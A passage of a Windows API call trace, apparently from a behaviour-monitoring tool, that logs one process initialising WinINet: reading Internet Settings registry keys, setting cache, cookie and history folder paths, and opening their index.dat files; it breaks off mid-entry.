| 07:43:39,795 | 1308 | RegQueryValueExA |
Handle => 0x000000b0 DataLength => 4 ValueName => Security_HKLM_only Type => 176 |
FAILURE | 0x00000002 | |
| 07:43:39,795 | 1308 | RegCloseKey |
Handle => 0x000000b0 |
SUCCESS | 0x00000000 | |
| 07:43:39,795 | 1308 | RegOpenKeyExA |
Handle => 0x000000b0 Registry => 0x80000002 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:39,795 | 1308 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000001 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
FAILURE | 0x00000002 | |
| 07:43:39,795 | 1308 | RegOpenKeyExA |
Handle => 0x000000bc Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:39,805 | 1308 | RegOpenKeyExA |
Handle => 0x000000c0 Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:39,805 | 1308 | RegQueryValueExA |
Handle => 0x000000b0 DataLength => 4 ValueName => EnableHttp1_1 Type => 176 |
FAILURE | 0x00000002 | |
| 07:43:39,805 | 1308 | RegQueryValueExA |
Handle => 0x000000c0 Data => 1 ValueName => EnableHttp1_1 |
SUCCESS | 0x00000000 | |
| 07:43:39,805 | 1308 | RegCloseKey |
Handle => 0x000000b0 |
SUCCESS | 0x00000000 | |
| 07:43:39,805 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:39,805 | 1308 | RegCloseKey |
Handle => 0x000000bc |
SUCCESS | 0x00000000 | |
| 07:43:39,805 | 1308 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 07:43:39,815 | 1308 | RegOpenKeyExA |
Handle => 0x000000c0 Registry => 0x80000002 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:39,815 | 1308 | RegQueryValueExA |
Handle => 0x000000c0 DataLength => 4 ValueName => Security_HKLM_only Type => 192 |
FAILURE | 0x00000002 | |
| 07:43:39,815 | 1308 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 07:43:39,815 | 1308 | RegOpenKeyExA |
Handle => 0x000000c0 Registry => 0x80000002 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:39,815 | 1308 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000001 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
FAILURE | 0x00000002 | |
| 07:43:39,815 | 1308 | RegOpenKeyExA |
Handle => 0x000000bc Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:39,815 | 1308 | RegOpenKeyExA |
Handle => 0x000000b0 Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:39,815 | 1308 | RegQueryValueExA |
Handle => 0x000000c0 DataLength => 4 ValueName => ProxyHttp1.1 Type => 192 |
FAILURE | 0x00000002 | |
| 07:43:39,815 | 1308 | RegQueryValueExA |
Handle => 0x000000b0 DataLength => 4 ValueName => ProxyHttp1.1 Type => 176 |
FAILURE | 0x00000002 | |
| 07:43:39,815 | 1308 | RegQueryValueExA |
Handle => 0x000000bc DataLength => 4 ValueName => ProxyHttp1.1 Type => 188 |
FAILURE | 0x00000002 | |
| 07:43:39,815 | 1308 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 07:43:39,815 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:39,815 | 1308 | RegCloseKey |
Handle => 0x000000bc |
SUCCESS | 0x00000000 | |
| 07:43:39,815 | 1308 | RegCloseKey |
Handle => 0x000000b0 |
SUCCESS | 0x00000000 | |
| 07:43:39,815 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 Data => 1 ValueName => EnableNegotiate |
SUCCESS | 0x00000000 | |
| 07:43:39,815 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DisableBasicOverClearChannel Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:39,815 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:39,815 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:39,825 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:39,825 | 1308 | RegOpenKeyExW |
Handle => 0x000000b0 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:39,825 | 1308 | RegQueryValueExA |
Handle => 0x000000b0 DataLength => 4 ValueName => Feature_ClientAuthCertFilter Type => 176 |
FAILURE | 0x00000002 | |
| 07:43:39,825 | 1308 | RegCloseKey |
Handle => 0x000000b0 |
SUCCESS | 0x00000000 | |
| 07:43:39,825 | 1308 | LdrLoadDll |
Flags => 12712372 BaseAddress => 0x77fe0000 FileName => Secur32.dll |
SUCCESS | 0x00000000 | |
| 07:43:39,825 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetUserNameExA FunctionAddress => 0x77fe1dca ModuleHandle => 0x77fe0000 |
SUCCESS | 0x00000000 | |
| 07:43:39,825 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => SyncMode5 Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:39,835 | 1308 | RegOpenKeyExA |
Handle => 0x000000bc Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache |
SUCCESS | 0x00000000 | |
| 07:43:39,835 | 1308 | RegQueryValueExA |
Handle => 0x000000bc DataLength => 4 ValueName => FixupKey Type => 188 |
FAILURE | 0x00000002 | |
| 07:43:39,835 | 1308 | RegCloseKey |
Handle => 0x000000bc |
SUCCESS | 0x00000000 | |
| 07:43:39,835 | 1308 | RegOpenKeyExA |
Handle => 0x000000bc Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache |
SUCCESS | 0x00000000 | |
| 07:43:39,835 | 1308 | RegQueryValueExA |
Handle => 0x000000bc DataLength => 4 ValueName => SessionStartTimeDefaultDeltaSecs Type => 188 |
FAILURE | 0x00000002 | |
| 07:43:39,845 | 1308 | RegCloseKey |
Handle => 0x000000bc |
SUCCESS | 0x00000000 | |
| 07:43:39,845 | 1308 | RegOpenKeyExA |
Handle => 0x000000bc Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache |
SUCCESS | 0x00000000 | |
| 07:43:39,845 | 1308 | RegOpenKeyExA |
Handle => 0x000000c0 Registry => 0x80000002 SubKey => System\Setup |
SUCCESS | 0x00000000 | |
| 07:43:39,845 | 1308 | RegQueryValueExA |
Handle => 0x000000c0 Data => 0 ValueName => SystemSetupInProgress |
SUCCESS | 0x00000000 | |
| 07:43:39,845 | 1308 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 07:43:39,845 | 1308 | RegOpenKeyExA |
Handle => 0x000000c0 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:39,845 | 1308 | RegOpenKeyExA |
Handle => 0x000000c4 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache |
SUCCESS | 0x00000000 | |
| 07:43:39,876 | 1308 | RegOpenKeyExA |
Handle => 0x000000c8 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:39,876 | 1308 | RegOpenKeyExA |
Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache |
SUCCESS | 0x00000000 | |
| 07:43:39,876 | 1308 | RegQueryValueExA |
Handle => 0x000000cc Data => Client UrlCache MMF Ver 5.2\x00 ValueName => Signature |
SUCCESS | 0x00000000 | |
| 07:43:39,876 | 1308 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 07:43:39,876 | 1308 | RegOpenKeyExA |
Handle => 0x000000cc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:39,876 | 1308 | RegQueryValueExA |
Handle => 0x000000cc DataLength => 54 ValueName => Cache Type => 2 |
SUCCESS | 0x00000000 | |
| 07:43:39,876 | 1308 | RegQueryValueExA |
Handle => 0x000000cc DataLength => 22 ValueName => Cookies Type => 2 |
SUCCESS | 0x00000000 | |
| 07:43:39,886 | 1308 | RegQueryValueExA |
Handle => 0x000000cc DataLength => 37 ValueName => History Type => 2 |
SUCCESS | 0x00000000 | |
| 07:43:39,886 | 1308 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 07:43:39,886 | 1308 | RegOpenKeyExA |
Handle => 0x000000cc Registry => 0x000000c4 SubKey => Content |
SUCCESS | 0x00000000 | |
| 07:43:39,886 | 1308 | RegQueryValueExA |
Handle => 0x000000cc DataLength => 4 ValueName => PerUserItem Type => 204 |
FAILURE | 0x00000002 | |
| 07:43:39,886 | 1308 | RegOpenKeyExA |
Handle => 0x000000d0 Registry => 0x000000bc SubKey => Content |
SUCCESS | 0x00000000 | |
| 07:43:39,886 | 1308 | RegQueryValueExA |
Handle => 0x000000d0 Data => 1 ValueName => PerUserItem |
SUCCESS | 0x00000000 | |
| 07:43:39,886 | 1308 | RegCloseKey |
Handle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:39,916 | 1308 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 07:43:39,916 | 1308 | RegOpenKeyExA |
Handle => 0x000000cc Registry => 0x000000c4 SubKey => Content |
SUCCESS | 0x00000000 | |
| 07:43:39,946 | 1308 | LdrLoadDll |
Flags => 12710464 BaseAddress => 0x7c9c0000 FileName => shell32.dll |
SUCCESS | 0x00000000 | |
| 07:43:39,946 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SHGetFolderPathA FunctionAddress => 0x7ca2ac11 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | RegCreateKeyExW |
Handle => 0x000000d0 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | RegQueryValueExW |
Handle => 0x000000d0 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00o\x00r\x00a\x00r\x00y\x00 \x00I\x00n\x00t\x00e\x00r\x00n\x00e\x00t\x00 \x00F\x00i\x00l\x00e\x00s\x00\x00\x00 ValueName => Cache |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | RegCloseKey |
Handle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | RegCreateKeyExW |
Handle => 0x000000d0 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | RegSetValueExW |
Handle => 0x000000d0 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00o\x00r\x00a\x00r\x00y\x00 \x00I\x00n\x00t\x00e\x00r\x00n\x00e\x00t\x00 \x00F\x00i\x00l\x00e\x00s\x00\x00\x00 ValueName => Cache Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | RegCloseKey |
Handle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files DesiredAccess => 0x00100100 FileHandle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | NtSetInformationFile |
FileHandle => 0x000000d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | RegQueryValueExA |
Handle => 0x000000cc Data => \x00 ValueName => CachePrefix |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | RegQueryValueExA |
Handle => 0x000000cc Data => 327323 ValueName => CacheLimit |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | RegOpenKeyExA |
Handle => 0x000000d0 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache |
SUCCESS | 0x00000000 | |
| 07:43:39,966 | 1308 | RegOpenKeyExA |
Handle => 0x000000dc Registry => 0x000000d0 SubKey => Paths |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegOpenKeyExA |
Handle => 0x000000e0 Registry => 0x000000dc SubKey => Path1 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegOpenKeyExA |
Handle => 0x000000e4 Registry => 0x000000dc SubKey => Path2 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x000000dc SubKey => Path3 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x000000dc SubKey => Path4 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegOpenKeyExA |
Handle => 0x000000f0 Registry => 0x000000d0 SubKey => Special Paths |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegSetValueExA |
Handle => 0x000000dc Buffer => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\x00 ValueName => Directory Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegSetValueExA |
Handle => 0x000000dc Buffer => 4 ValueName => Paths Type => 4 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegSetValueExA |
Handle => 0x000000e0 Buffer => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\Cache1\x00 ValueName => CachePath Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegSetValueExA |
Handle => 0x000000e4 Buffer => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\Cache2\x00 ValueName => CachePath Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegSetValueExA |
Handle => 0x000000e8 Buffer => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\Cache3\x00 ValueName => CachePath Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegSetValueExA |
Handle => 0x000000ec Buffer => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\Cache4\x00 ValueName => CachePath Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegSetValueExA |
Handle => 0x000000e0 Buffer => 81830 ValueName => CacheLimit Type => 4 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegSetValueExA |
Handle => 0x000000e4 Buffer => 81830 ValueName => CacheLimit Type => 4 |
SUCCESS | 0x00000000 | |
| 07:43:39,976 | 1308 | RegSetValueExA |
Handle => 0x000000e8 Buffer => 81830 ValueName => CacheLimit Type => 4 |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegSetValueExA |
Handle => 0x000000ec Buffer => 81830 ValueName => CacheLimit Type => 4 |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegCloseKey |
Handle => 0x000000e4 |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegCloseKey |
Handle => 0x000000e0 |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegCloseKey |
Handle => 0x000000dc |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegCloseKey |
Handle => 0x000000f0 |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegCloseKey |
Handle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegOpenKeyExA |
Handle => 0x000000d0 Registry => 0x000000c4 SubKey => Cookies |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegQueryValueExA |
Handle => 0x000000d0 DataLength => 4 ValueName => PerUserItem Type => 208 |
FAILURE | 0x00000002 | |
| 07:43:40,006 | 1308 | RegOpenKeyExA |
Handle => 0x000000f0 Registry => 0x000000bc SubKey => Cookies |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegQueryValueExA |
Handle => 0x000000f0 Data => 1 ValueName => PerUserItem |
SUCCESS | 0x00000000 | |
| 07:43:40,006 | 1308 | RegCloseKey |
Handle => 0x000000f0 |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegCloseKey |
Handle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegOpenKeyExA |
Handle => 0x000000cc Registry => 0x000000c4 SubKey => Cookies |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegCreateKeyExW |
Handle => 0x000000d0 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegQueryValueExW |
Handle => 0x000000d0 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00C\x00o\x00o\x00k\x00i\x00e\x00s\x00\x00\x00 ValueName => Cookies |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegCloseKey |
Handle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegCreateKeyExW |
Handle => 0x000000d0 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegSetValueExW |
Handle => 0x000000d0 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\\x00C\x00o\x00o\x00k\x00i\x00e\x00s\x00\x00\x00 ValueName => Cookies Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegCloseKey |
Handle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegQueryValueExA |
Handle => 0x000000cc Data => Cookie:\x00 ValueName => CachePrefix |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegQueryValueExA |
Handle => 0x000000cc Data => 8192 ValueName => CacheLimit |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegOpenKeyExA |
Handle => 0x000000d0 Registry => 0x000000c4 SubKey => History |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegQueryValueExA |
Handle => 0x000000d0 DataLength => 4 ValueName => PerUserItem Type => 208 |
FAILURE | 0x00000002 | |
| 07:43:40,016 | 1308 | RegOpenKeyExA |
Handle => 0x000000f0 Registry => 0x000000bc SubKey => History |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegQueryValueExA |
Handle => 0x000000f0 Data => 1 ValueName => PerUserItem |
SUCCESS | 0x00000000 | |
| 07:43:40,016 | 1308 | RegCloseKey |
Handle => 0x000000f0 |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegCloseKey |
Handle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegOpenKeyExA |
Handle => 0x000000cc Registry => 0x000000c4 SubKey => History |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegCreateKeyExW |
Handle => 0x000000d0 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegQueryValueExW |
Handle => 0x000000d0 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00H\x00i\x00s\x00t\x00o\x00r\x00y\x00\x00\x00 ValueName => History |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegCloseKey |
Handle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegCreateKeyExW |
Handle => 0x000000d0 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegSetValueExW |
Handle => 0x000000d0 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00D\x00W\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00H\x00i\x00s\x00t\x00o\x00r\x00y\x00\x00\x00 ValueName => History Type => 1 |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegCloseKey |
Handle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\TDW\Local Settings\History DesiredAccess => 0x00100100 FileHandle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | NtSetInformationFile |
FileHandle => 0x000000d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegQueryValueExA |
Handle => 0x000000cc Data => Visited:\x00 ValueName => CachePrefix |
SUCCESS | 0x00000000 | |
| 07:43:40,046 | 1308 | RegQueryValueExA |
Handle => 0x000000cc Data => 8192 ValueName => CacheLimit |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | RegCloseKey |
Handle => 0x000000cc |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | RegCloseKey |
Handle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | RegCloseKey |
Handle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | RegCloseKey |
Handle => 0x000000c4 |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | RegCloseKey |
Handle => 0x000000bc |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | NtOpenMutant |
Handle => 0x000000bc MutexName => _!MSFTHISTORY!_ |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | NtOpenMutant |
Handle => 0x000000c4 MutexName => c:!documents and settings!tdw!local settings!temporary internet files!content.ie5! |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x7c800000 FileName => KERNEL32 |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetDiskFreeSpaceExA FunctionAddress => 0x7c83038b ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | NtOpenFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ DesiredAccess => 0x00100001 FileHandle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | NtOpenFile |
ShareAccess => 3 FileName => C:\ DesiredAccess => 0x00100001 FileHandle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ DesiredAccess => 0x00100100 FileHandle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | NtSetInformationFile |
FileHandle => 0x000000c0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:40,056 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\index.dat DesiredAccess => 0xc0100080 CreateDisposition => 3 FileHandle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 07:43:40,066 | 1308 | NtSetInformationFile |
FileHandle => 0x000000c0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:40,066 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:40,066 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\index.dat DesiredAccess => 0xc0100080 CreateDisposition => 3 FileHandle => 0x000000c0 |
SUCCESS | 0x00000000 | |
| 07:43:40,066 | 1308 | NtOpenSection |
DesiredAccess => 0x00000002 ObjectAttributes => C:\ntdll SectionHandle => 0x000000c8 |
SUCCESS | 0x00000000 | |
| 07:43:40,066 | 1308 | ZwMapViewOfSection |
SectionOffset => 0x00c1f86c SectionHandle => 0x000000c8 ProcessHandle => 0xffffffff BaseAddress => 0x004c0000 |
SUCCESS | 0x00000000 | |
| 07:43:40,076 | 1308 | NtOpenMutant |
Handle => 0x000000cc MutexName => c:!documents and settings!tdw!cookies! |
SUCCESS | 0x00000000 | |
| 07:43:40,076 | 1308 | NtOpenFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\ DesiredAccess => 0x00100001 FileHandle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,076 | 1308 | NtOpenFile |
ShareAccess => 3 FileName => C:\ DesiredAccess => 0x00100001 FileHandle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,076 | 1308 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\TDW\Cookies\ DesiredAccess => 0x00100100 FileHandle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,076 | 1308 | NtSetInformationFile |
FileHandle => 0x000000d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:40,076 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\index.dat DesiredAccess => 0xc0100080 CreateDisposition => 3 FileHandle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,076 | 1308 | NtSetInformationFile |
FileHandle => 0x000000d0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:40,076 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000d0 FileInformation => \x00\x80\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:40,076 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\index.dat DesiredAccess => 0xc0100080 CreateDisposition => 3 FileHandle => 0x000000d0 |
SUCCESS | 0x00000000 | |
| 07:43:40,076 | 1308 | NtOpenSection |
DesiredAccess => 0x00000002 ObjectAttributes => C:\C:_Documents and Settings_TDW_Cookies_index.dat_32768 SectionHandle => 0x000000f0 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | ZwMapViewOfSection |
SectionOffset => 0x00c1f86c SectionHandle => 0x000000f0 ProcessHandle => 0xffffffff BaseAddress => 0x00c20000 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtOpenMutant |
